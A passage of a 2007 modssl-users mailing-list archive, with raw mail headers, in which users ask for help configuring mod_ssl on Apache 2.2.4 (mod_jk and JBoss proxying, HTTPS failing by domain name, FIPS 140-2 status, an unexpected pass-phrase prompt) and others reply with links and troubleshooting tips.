has been successfully configured and working with two instances of
Jboss.

However after installing mod_ssl, does not seem to be
installed/configured properly. Is there some link which describes step
by step setup process to configure=20

Mod_ssl with apache 2.2.4? Can anyone please forward the link?=20

=20

Also, we have three ports, two of them need to be https and one needs to
be http. How do we configure this?

=20

In our configuration, we want Apache to receive https requests from
clients and then forward http to the Jboss application server thru
mod_jk. Can someone please point to some link/documentation.

We would assume these are standard practices.

=20

Thank you so very much for your kind help.

=20

Regards,

SS


------_=_NextPart_001_01C7AD36.85840E23
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















Hi,



 



We are trying to setup apache 2.2.4 alongwith mod_ssl =
and
mod_jk. Mod_jk has been successfully configured and working with two =
instances
of Jboss.



However after installing mod_ssl, does not seem to be
installed/configured properly. Is there some link which describes step =
by step
setup process to configure 



Mod_ssl with apache 2.2.4? Can anyone please forward =
the
link? 



 



Also, we have three ports, two of them need to be =
https and
one needs to be http. How do we configure =
this?



 



In our configuration, we want Apache to receive https
requests from clients and then forward http to the Jboss application =
server
thru mod_jk. Can someone please point to some =
link/documentation.



We would assume these are standard =
practices.



 



Thank you so very much for your kind =
help.



 



Regards,



SS









------_=_NextPart_001_01C7AD36.85840E23--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 13 00:22:39 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 69CD514D868; Wed, 13 Jun 2007 00:22:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sceptre.pobox.com (sceptre.pobox.com [207.106.133.20])
	by master.modssl.org (Postfix) with ESMTP id 9BE6914D82E
	for ; Wed, 13 Jun 2007 00:22:36 +0200 (CEST)
Received: from sceptre (localhost.localdomain [127.0.0.1])
	by sceptre.pobox.com (Postfix) with ESMTP id 32FAD2F2
	for ; Tue, 12 Jun 2007 18:22:05 -0400 (EDT)
Received: from [192.168.1.219] (unknown [69.55.70.22])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by sceptre.sasl.smtp.pobox.com (Postfix) with ESMTP id EC45858C98
	for ; Tue, 12 Jun 2007 18:22:04 -0400 (EDT)
Message-ID: <466F1C75.2060608@w3works.com>
Date: Tue, 12 Jun 2007 22:21:41 +0000
From: Dave Paris 
Organization: W3Works, LLC
User-Agent: Thunderbird 1.5.0.10 (Windows/20070221)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: mod_ssl setup process with apache 2.2.4
References: <3901F85E21D7EE44AC427250A221A53B064BC370@vegas.vormetric.com>
In-Reply-To: <3901F85E21D7EE44AC427250A221A53B064BC370@vegas.vormetric.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

That sounds like a lot of unnecessary overhead for the Apache boxes. 
Check:  http://www.apsis.ch/pound/  .. it does precisely what you seek.

Best~
-d

Saikat Saha wrote:
> Hi,
> 
>  
> 
> We are trying to setup apache 2.2.4 alongwith mod_ssl and mod_jk. Mod_jk 
> has been successfully configured and working with two instances of Jboss.
> 
> However after installing mod_ssl, does not seem to be 
> installed/configured properly. Is there some link which describes step 
> by step setup process to configure
> 
> Mod_ssl with apache 2.2.4? Can anyone please forward the link?
> 
>  
> 
> Also, we have three ports, two of them need to be https and one needs to 
> be http. How do we configure this?
> 
>  
> 
> In our configuration, we want Apache to receive https requests from 
> clients and then forward http to the Jboss application server thru 
> mod_jk. Can someone please point to some link/documentation.
> 
> We would assume these are standard practices.
> 
>  
> 
> Thank you so very much for your kind help.
> 
>  
> 
> Regards,
> 
> SS
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 14 17:07:48 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CFD9314D86B; Thu, 14 Jun 2007 17:07:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cluster-j.mailcontrol.com (cluster-j.mailcontrol.com [86.111.223.190])
	by master.modssl.org (Postfix) with ESMTP id 4721114D83E
	for ; Thu, 14 Jun 2007 17:07:47 +0200 (CEST)
Received: from clotho.retainagroup.com (no-dns-yet-assigned.orbital.net [80.88.213.165] (may be forged))
	by rly45j.srv.mailcontrol.com (MailControl) with ESMTP id l5EF6Mn8002954
	for ; Thu, 14 Jun 2007 16:06:27 +0100
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C7AE95.C10443EE"
X-MimeOLE: Produced By Microsoft Exchange V6.5
Subject: SSL by Domain Name Error
Date: Thu, 14 Jun 2007 16:07:41 +0100
Message-ID: <59D4AF29ACE8044BB4C34C36A08A03AC314723@clotho.retainagroup.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL by Domain Name Error
thread-index: AceulcJbx4PbZV+aRO2Y5sJv6wbWrA==
From: "Rob Archer" 
To: 
X-Scanned-By: MailControl A-07-07-05 (www.mailcontrol.com) on 10.74.0.155
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rob Archer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C7AE95.C10443EE
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Apache 2.2.4 Windows 2000 Server=20
=20
Have created the key through open ssl and configured apache (using
http://raibledesigns.com/wiki/Wiki.jsp?page=3DApacheSSL instructions) and
can access https via the IP address of the web server but not the domain
name. When trying to get the to the webserver via the domain name
through https it says internet explorer cannot display this web page.
Using the normal http protocol I can get the "It Works" page through
both IP address and domain name.
=20
Have tried to get around this by fiddling about with the virtual hosts
settings but haven't found any solution. Can anyone help !!!


Any opinions expressed in this email are those of the individual and not ne=
cessarily the Company. This email and any files transmitted with it are con=
fidential and solely for use by the intended recipient(s). It may contain m=
aterial protected by Statutory or Regulatory Law. If you are not the intend=
ed recipient or the person responsible for delivering to the intended recip=
ient, you have received this email in error and its use is strictly prohibi=
ted. If you have received it in error please notify our Network Administrat=
or.

Although this email and any attachments are believed to be free of any viru=
s, or any other defect which might affect any computer or IT system into wh=
ich they are received and opened, it is the responsibility of the recipient=
 to ensure that they are virus free and no responsibility is accepted by Re=
tainagroup Ltd for any loss or damage arising in any way from receipt or us=
e thereof.

Company Registered in England No. 3164074.  Registered Address: Unit 5, St.=
 John's Court, Foster Road, Ashford Business Park, Ashford, Kent. TN24 0SJ.

(Tech Email: exadmin@retainagroup.co.uk,  Tech No.01233 333104,   Main No. =
01233 333000)=20

This message has been scanned for viruses by BlackSpider MailControl

------_=_NextPart_001_01C7AE95.C10443EE
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


Message






Apache 2.=
2.4 Windows=20
2000 Server 


 


Have crea=
ted the key=20
through open ssl and configured apache (using http://rai=
bledesigns.com/wiki/Wiki.jsp?page=3DApacheSSL instructions)=20
and


can acces=
s https via=20
the IP address of the web server but not the domain name. When trying to ge=
t the=20
to the webserver via the domain name through https it says internet explore=
r=20
cannot display this web page. Using the normal http protocol I can get the =
"It=20
Works" page through both IP address and domain name.


 


Have trie=
d to get=20
around this by fiddling about with the virtual hosts settings but haven't f=
ound=20
any solution. Can anyone help !!!





Any opinions expressed in this email are those of the ind=
ividual and not necessarily the Company. This email and any files transmitt=
ed with it are confidential and solely for use by the intended recipient(s)=
. It may contain material protected by Statutory or Regulatory Law. If you =
are not the intended recipient or the person responsible for delivering to =
the intended recipient, you have received this email in error and its use i=
s strictly prohibited. If you have received it in error please notify our N=
etwork Administrator.


Altho=
ugh this email and any attachments are believed to be free of any virus, or=
 any other defect which might affect any computer or IT system into which t=
hey are received and opened, it is the responsibility of the recipient to e=
nsure that they are virus free and no responsibility is accepted by Retaina=
group Ltd for any loss or damage arising in any way from receipt or use the=
reof.


Compa=
ny Registered in England No. 3164074.  Registered Address: Unit 5, St.=
 John's Court, Foster Road, Ashford Business Park, Ashford, Kent. TN24 0SJ.=



(Tech Email: exadmin@retainagroup.co.uk,  Tech No.01233 333104,  &n=
bsp;Main No. 01233 333000) 


This message has been scanned for viruses by BlackSpider MailControl



------_=_NextPart_001_01C7AE95.C10443EE--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 15 06:39:39 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 91E0D14D85D; Fri, 15 Jun 2007 06:39:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wx-out-0506.google.com (wx-out-0506.google.com [66.249.82.239])
	by master.modssl.org (Postfix) with ESMTP id 7A1D914D82E
	for ; Fri, 15 Jun 2007 06:39:38 +0200 (CEST)
Received: by wx-out-0506.google.com with SMTP id h29so672773wxd
        for ; Thu, 14 Jun 2007 21:38:41 -0700 (PDT)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=CmUc68ZlGJqWWYl+LheiJckfoC893vz3zVzhCw5eakA5ZOQ+It1tWKVlGjdQddaw1H6aYMgwS+do8y6ZuMH3hOsaWDRNcA8b1toHJtNvI7bbx+BcY389cdYwjQx+mr4Ui7eKi9rRkTQCDbdGbxaW4GEImPN9F6xSDXujqIkbm8E=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=BNgKOv8EJ0/zb5fCG4xETBgKtiX6/OWAjxbVBVlh+Xn9Zf+4c2wSQ4WBoouFwGUtXKlQoOZpYh4W/Kqi8glVCTFqsLx8+D9OsLC9YMaWY6eSxaeO6r7sEBc+3jjHcIl6b7zBNrqsHXgWZHcwKrhVr9Ot6mhZFaKzdqQZEax3fkM=
Received: by 10.90.90.3 with SMTP id n3mr2284890agb.1181882321107;
        Thu, 14 Jun 2007 21:38:41 -0700 (PDT)
Received: by 10.90.94.11 with HTTP; Thu, 14 Jun 2007 21:38:41 -0700 (PDT)
Message-ID: <81c76d150706142138q381295ccvf1dab28b6584d505@mail.gmail.com>
Date: Thu, 14 Jun 2007 23:38:41 -0500
From: "Lalit Kapoor" 
To: modssl-users@modssl.org
Subject: Re: adding mod_ssl module to existing apache configuration
In-Reply-To: <466ED943.4040202@allez-oop.net>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_34515_8247559.1181882321086"
References: <81c76d150706121018n3e877d49u720dff6b15bfaefe@mail.gmail.com>
	 <466ED943.4040202@allez-oop.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lalit Kapoor" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_34515_8247559.1181882321086
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

my apology for late replies...it works for me.

Thanks Team !!!

On 6/12/07, Omar W. Hannet  wrote:
>
> Lalit Kapoor wrote:
>
> > Can you give me some idea if it possible to add mod_ssl in running
> > configuration or do i need to recompile and install apache with mod_ssl.
>
> Have you tried 'yum install mod_ssl'?
>
> --
> Omar W. Hannet
> http://www.allez-oop.net/
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

------=_Part_34515_8247559.1181882321086
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

my apology for late replies...it works for me.

Thanks Team !!!

On 6/12/07, Omar W. Hannet <ohannet@allez-oop.net
> wrote:
Lalit Kapoor wrote:

> Can you give me some idea if it possible to add mod_ssl in running

> configuration or do i need to recompile and install apache with mod_ssl.

Have you tried 'yum install mod_ssl'?

--
Omar W. Hannet
http://www.allez-oop.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      
modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



------=_Part_34515_8247559.1181882321086--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 15 20:27:11 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4396614D86E; Fri, 15 Jun 2007 20:27:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dalsmrelay2.nai.com (dalsmrelay2.nai.com [205.227.136.216])
	by master.modssl.org (Postfix) with ESMTP id C0EFF14D82E
	for ; Fri, 15 Jun 2007 20:27:10 +0200 (CEST)
Received: from dalexwsout2.corp.nai.com (dalexwsout2.na.nai.com [161.69.212.93])
	by dalsmrelay2.nai.com (Switch-3.1.8/Switch-3.1.0) with SMTP id l5FI3gxN004834
	for ; Fri, 15 Jun 2007 13:03:42 -0500
Received: from (unknown [161.69.5.246]) by dalexwsout2.corp.nai.com with smtp
	 id 3587_10e25b32_1b6d_11dc_be23_00142213307c;
	Fri, 15 Jun 2007 13:20:16 -0500
Received: from mviexmb1.corp.nai.org ([161.69.77.203]) by sncexbr1.corp.nai.org with Microsoft SMTPSVC(6.0.3790.1830);
	 Fri, 15 Jun 2007 11:26:16 -0700
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C7AF7A.A8EA93E6"
Subject: Apache mod_ssl and FIPS 140-2
Date: Fri, 15 Jun 2007 11:26:16 -0700
Message-ID: <481B1DF8C957AB41B11238AF60118C7405DED0A5@mviexmb1.corp.nai.org>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Apache mod_ssl and FIPS 140-2
Thread-Index: AceveqWdXy7WcpipQzu7ZVYuS1mKZQ==
From: 
To: 
X-OriginalArrivalTime: 15 Jun 2007 18:26:16.0067 (UTC) FILETIME=[A910CD30:01C7AF7A]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C7AF7A.A8EA93E6
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Does anyone know if the Apache v2.2.x implementation of OpenSSL mod_ssl
is FIPS 140-2 validated? What version of OpenSSL is distributed with the
current version of Apache? Any help is much appreciated...

=20

Thanks,

David Gerendas, CISSP=20
McAfee, Inc.=20
949-297-5600 Main=20
949-860-3369 Direct=20
949-289-8677 Mobile=20
david_gerendas@mcafee.com  =20

=20


------_=_NextPart_001_01C7AF7A.A8EA93E6
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


















Does anyone know if the Apache v2.2.x implementation =
of
OpenSSL mod_ssl is FIPS 140-2 validated? What version of OpenSSL is =
distributed
with the current version of Apache? Any help is much =
appreciated…



 



Thanks,



David Gerendas, CISSP 

McAfee, =
Inc.


949-297-5600 =
Main


949-860-3369 =
Direct


949-289-8677 =
Mobile 

david_gerendas@mcafee.com




 









------_=_NextPart_001_01C7AF7A.A8EA93E6--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 15 21:19:04 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A150714D86E; Fri, 15 Jun 2007 21:19:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sceptre.pobox.com (sceptre.pobox.com [207.106.133.20])
	by master.modssl.org (Postfix) with ESMTP id 4157014D82E
	for ; Fri, 15 Jun 2007 21:19:01 +0200 (CEST)
Received: from sceptre (localhost.localdomain [127.0.0.1])
	by sceptre.pobox.com (Postfix) with ESMTP id 498112F0
	for ; Fri, 15 Jun 2007 15:18:29 -0400 (EDT)
Received: from [192.168.1.219] (unknown [69.55.70.22])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by sceptre.sasl.smtp.pobox.com (Postfix) with ESMTP id 0AD4759D21
	for ; Fri, 15 Jun 2007 15:18:28 -0400 (EDT)
Message-ID: <4672E5ED.8070909@w3works.com>
Date: Fri, 15 Jun 2007 19:18:05 +0000
From: Dave Paris 
Organization: W3Works, LLC
User-Agent: Thunderbird 1.5.0.12 (Windows/20070509)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache mod_ssl and FIPS 140-2
References: <481B1DF8C957AB41B11238AF60118C7405DED0A5@mviexmb1.corp.nai.org>
In-Reply-To: <481B1DF8C957AB41B11238AF60118C7405DED0A5@mviexmb1.corp.nai.org>
Content-Type: text/plain; charset=windows-1252; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

http://csrc.nist.gov/cryptval/140-1/1401val2007.htm#733

Best~
-d

David_Gerendas@McAfee.com wrote:
> Does anyone know if the Apache v2.2.x implementation of OpenSSL mod_ssl 
> is FIPS 140-2 validated? What version of OpenSSL is distributed with the 
> current version of Apache? Any help is much appreciated…
> 
>  
> 
> Thanks,
> 
> *David Gerendas, **CISSP*
> McAfee, Inc.
> 949-297-5600 Main
> 949-860-3369 Direct
> 949-289-8677 Mobile
> david_gerendas@mcafee.com 
> 
>  
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 16 00:55:01 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 25D1014D88F; Sat, 16 Jun 2007 00:55:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from v200.vormetric.com (adsl-68-121-169-125.dsl.pltn13.pacbell.net [68.121.169.125])
	by master.modssl.org (Postfix) with ESMTP id 8F93714D863
	for ; Sat, 16 Jun 2007 00:54:58 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C7AFA0.11D703D2"
Subject: Apache with mod_ssl
Date: Fri, 15 Jun 2007 15:54:02 -0700
Message-ID: <3901F85E21D7EE44AC427250A221A53B065B1337@vegas.vormetric.com>
In-Reply-To: <481B1DF8C957AB41B11238AF60118C7405DED0A5@mviexmb1.corp.nai.org>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Apache with mod_ssl
Thread-Index: AceveqWdXy7WcpipQzu7ZVYuS1mKZQAJM3MA
From: "Saikat Saha" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Saikat Saha" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C7AFA0.11D703D2
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

We have apache 2.2.4 compiled with all modules but commented out all
load modules. Do not have anything in httpd.conf file to state that this
is https. But when I start apache, it tries to goto https and prompts
for pass phrase. How does apache determine that this is https whereas
this is actually a http server. After I enter a passphrase, it shows
successful but the server never starts up. Can someone please help?

=20

Also can apache support both http and https at different ports at the
same time?

=20

Thanks much for your help.

SS

=20

=20

=20

[root@rh4_109 bin]# ./apachectl start

Apache/2.2.4 mod_ssl/2.2.4 (Pass Phrase Dialog)

Some of your private key files are encrypted for security reasons.

In order to read them you have to provide the pass phrases.

=20

Server 10.3.110.109:443 (RSA)

Enter pass phrase:

=20

OK: Pass Phrase Dialog successful.

=20

=20

Httpd.conf=20

=20

# Secure (SSL/TLS) connections

#Include conf/extra/httpd-ssl.conf

#

# Note: The following must must be present to support

#       starting without SSL on platforms with no /dev/random equivalent

#       but a statically compiled-in mod_ssl.

#



SSLRandomSeed startup builtin

SSLRandomSeed connect builtin




------_=_NextPart_001_01C7AFA0.11D703D2
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















We have apache 2.2.4 compiled with =
all
modules but commented out all load modules. Do not have anything in =
httpd.conf
file to state that this is https. But when I start apache, it tries to =
goto
https and prompts for pass phrase. How does apache determine that this =
is https
whereas this is actually a http server. After I enter a passphrase, it =
shows
successful but the server never starts up. Can someone please =
help?



 



Also can apache support both http =
and
https at different ports at the same time?



 



Thanks much for your =
help.



SS



 



 



 



[root@rh4_109 bin]# ./apachectl =
start



Apache/2.2.4 mod_ssl/2.2.4 (Pass =
Phrase
Dialog)



Some of your private key files are
encrypted for security reasons.



In order to read them you have to =
provide
the pass phrases.



 



Server 10.3.110.109:443 =
(RSA)



Enter pass =
phrase:



 



OK: Pass Phrase Dialog =
successful.



 



 



Httpd.conf =




 



# Secure (SSL/TLS) =
connections



#Include =
conf/extra/httpd-ssl.conf



#



# Note: The following must must be =
present
to support



#      =
; starting without SSL on platforms
with no /dev/random equivalent



#      =
; but a statically compiled-in
mod_ssl.



#



<IfModule =
ssl_module>



SSLRandomSeed startup =
builtin



SSLRandomSeed connect =
builtin



</IfModule><=
/font>









------_=_NextPart_001_01C7AFA0.11D703D2--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 16 01:14:15 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B278414D895; Sat, 16 Jun 2007 01:14:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mower.iserver.net (mower.iserver.net [128.121.79.16])
	by master.modssl.org (Postfix) with ESMTP id 17A8714D863
	for ; Sat, 16 Jun 2007 01:14:12 +0200 (CEST)
Received: from gromit.corp.verio.net (fw.oremut02.us.wh.verio.net [198.65.168.24])
	(authenticated bits=0)
	by mower.iserver.net (8.13.6.20060614/8.13.6) with ESMTP id l5FNDHlc009419
	for ; Fri, 15 Jun 2007 17:13:18 -0600 (MDT)
Message-ID: <46731D08.9050908@allez-oop.net>
Date: Fri, 15 Jun 2007 17:13:12 -0600
From: "Omar W. Hannet" 
User-Agent: Thunderbird 2.0.0.4 (X11/20070615)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache with mod_ssl
References: <3901F85E21D7EE44AC427250A221A53B065B1337@vegas.vormetric.com>
In-Reply-To: <3901F85E21D7EE44AC427250A221A53B065B1337@vegas.vormetric.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar W. Hannet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Saikat Saha wrote:
> We have apache 2.2.4 compiled with all modules but commented out all 
> load modules. Do not have anything in httpd.conf file to state that this 
> is https. But when I start apache, it tries to goto https and prompts 
> for pass phrase. How does apache determine that this is https whereas 
> this is actually a http server.

Perhaps mod_ssl is a compiled-in module.  Run 'httpd -l' to check this.

> After I enter a passphrase, it shows 
> successful but the server never starts up. Can someone please help?

The reason probably can be found in Apache's error_log file.

> Also can apache support both http and https at different ports at the 
> same time?

Yes.  The defaults are port 80 for http and port 443 for https.

-- 
Omar W. Hannet
http://www.allez-oop.net/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 16 01:22:14 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5291A14D893; Sat, 16 Jun 2007 01:22:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from v200.vormetric.com (adsl-68-121-169-125.dsl.pltn13.pacbell.net [68.121.169.125])
	by master.modssl.org (Postfix) with ESMTP id B9BE914D863
	for ; Sat, 16 Jun 2007 01:22:11 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Apache with mod_ssl
Date: Fri, 15 Jun 2007 16:21:16 -0700
Message-ID: <3901F85E21D7EE44AC427250A221A53B065B1344@vegas.vormetric.com>
In-Reply-To: <46731D08.9050908@allez-oop.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Apache with mod_ssl
Thread-Index: AcevouLeW3dWPAgaT4OX3b2B9PvopQAAHxGw
From: "Saikat Saha" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Saikat Saha" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Apache was compiled as below

./configure --with-ldap --enable-mods-shared=3D"all ssl ldap cache proxy
authn_alias mem_cache file_cache authnz_ldap charset_lite dav_lock
disk_cache" --prefix=3D/opt/apache-2.2.4

Httpd -l gives below
[root@rh4_109 bin]# httpd -l
Compiled in modules:
  core.c
  prefork.c
  http_core.c
  mod_so.c

How do I compile so that it does not load mod_ssl automatically and
loads only if httpd.conf is configured.

Surprisingly there are no error logs even at debug level.

Thank you so very much for the kind help.

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
Sent: Friday, June 15, 2007 4:13 PM
To: modssl-users@modssl.org
Subject: Re: Apache with mod_ssl

Saikat Saha wrote:
> We have apache 2.2.4 compiled with all modules but commented out all=20
> load modules. Do not have anything in httpd.conf file to state that
this=20
> is https. But when I start apache, it tries to goto https and prompts=20
> for pass phrase. How does apache determine that this is https whereas=20
> this is actually a http server.

Perhaps mod_ssl is a compiled-in module.  Run 'httpd -l' to check this.

> After I enter a passphrase, it shows=20
> successful but the server never starts up. Can someone please help?

The reason probably can be found in Apache's error_log file.

> Also can apache support both http and https at different ports at the=20
> same time?

Yes.  The defaults are port 80 for http and port 443 for https.

--=20
Omar W. Hannet
http://www.allez-oop.net/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 18 10:47:17 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D2D1514D9DE; Mon, 18 Jun 2007 10:47:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cluster-e.mailcontrol.com (cluster-e.mailcontrol.com [217.79.216.190])
	by master.modssl.org (Postfix) with ESMTP id 0C11314D841
	for ; Mon, 18 Jun 2007 10:47:14 +0200 (CEST)
Received: from clotho.retainagroup.com (no-dns-yet-assigned.orbital.net [80.88.213.165] (may be forged))
	by rly37e.srv.mailcontrol.com (MailControl) with ESMTP id l5I8kBLw006977
	for ; Mon, 18 Jun 2007 09:46:12 +0100
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C7B185.50C49872"
Subject: RE: SSL by Domain Name Error
X-MimeOLE: Produced By Microsoft Exchange V6.5
Date: Mon, 18 Jun 2007 09:47:34 +0100
Message-ID: <59D4AF29ACE8044BB4C34C36A08A03AC314726@clotho.retainagroup.com>
